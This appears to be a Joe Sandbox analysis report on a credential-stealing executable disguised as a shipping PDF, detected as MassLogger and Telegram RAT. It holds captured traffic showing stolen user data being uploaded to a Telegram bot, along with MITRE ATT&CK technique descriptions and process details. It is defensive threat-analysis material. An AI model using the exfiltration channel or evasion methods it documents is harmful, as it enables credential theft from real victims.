2025-03-17 10:09:46 UTC	1089	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 36 35 31 61 37 34 35 35 66 31 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd651a7455f1eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-03-17 10:09:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 17 Mar 2025 10:09:46 GMT Content-Type: application/json Content-Length: 557 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-03-17 10:09:46 UTC	557	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 38 36 32 32 38 35 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 33 32 34 30 37 38 35 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 64 73 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 64 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 6f 64 73 62 6f 64 73 35 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 32 30 36 31 38 36 2c 22 64 6f 63 Data Ascii: {"ok":true,"result":{"message_id":2634,"from":{"id":7686228576,"is_bot":true,"first_name":"bodsbods","username":"bodsbods_bot"},"chat":{"id":7632407857,"first_name":"Bods","last_name":"Bods","username":"bodsbods51","type":"private"},"date":1742206186,"doc

Statistics

CPU Usage

• Shipment Document BL,INV and packing list.pdf.exe
• RegSvcs.exe

Click to jump to process

Memory Usage

• Shipment Document BL,INV and packing list.pdf.exe
• RegSvcs.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Behavior

• Shipment Document BL,INV and packing list.pdf.exe
• RegSvcs.exe

Click to jump to process

Target ID:	0
Start time:	06:09:34
Start date:	17/03/2025
Path:	C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
Imagebase:	0x10f0000
File size:	971'776 bytes
MD5 hash:	5FD799C047C81A8EFB15D9A32F1D8E39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.357445632.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:09:35
Start date:	17/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipment Document BL,INV and packing list.pdf.exe"
Imagebase:	0x250000
File size:	45'248 bytes
MD5 hash:	19855C0DC5BEC9FDF925307C57F9F5FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.879629468.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.879714743.0000000002123000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipment Document BL,INV and packing list.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Lityerses

C:\Users\user\AppData\Local\Temp\aut6E2E.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Windows Analysis Report
Shipment Document BL,INV and packing list.pdf.exe